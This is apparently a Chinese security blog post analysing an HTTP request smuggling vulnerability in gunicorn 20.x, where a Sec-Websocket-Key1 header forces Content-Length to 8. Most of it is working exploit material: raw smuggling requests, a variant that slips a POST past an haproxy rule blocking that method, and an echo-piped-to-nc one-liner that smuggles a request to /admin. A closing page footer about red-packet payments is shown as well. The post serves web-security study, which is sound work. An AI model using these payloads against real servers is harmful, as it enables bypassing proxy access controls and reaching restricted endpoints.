【WEB】gunicorn走私漏洞

gunicorn走私漏洞

  • 源码:https://github.com/benoitc/gunicorn
  • 漏洞定位:https://github.com/benoitc/gunicorn/blob/20.x/gunicorn/http/message.py#142

漏洞分析

在这里插入图片描述
只要header里面存在Sec-Websocket-Key1
那么就将content_length强制赋值为8
比较简单直接构造POC

POC

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

gunicorn会认为上述请求是两个请求


GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxx

GET /other HTTP/1.1
Host: example.com

但其他的代理服务器则会认为是一个请求,因为没有Sec-Websocket-Key1的逻辑

那么借此就可以绕过gunicorn之外的一些服务器的限制

利用

在这里插入图片描述

例如前端haproxy拒绝访问POST请求,但是gunicorn可以访问
则可以利用上述POC构造

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxPOST /other HTTP/1.1
Host: example.com

关于Content-Length如何构造

在这里插入图片描述
burp开启自动更新则可以计算body的大小
关闭则可以自己repeat poc

或者使用命令行nc

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 68\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 9999 

这里需要自己计算不同的content-length在不同的proxy中的请求体内容。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值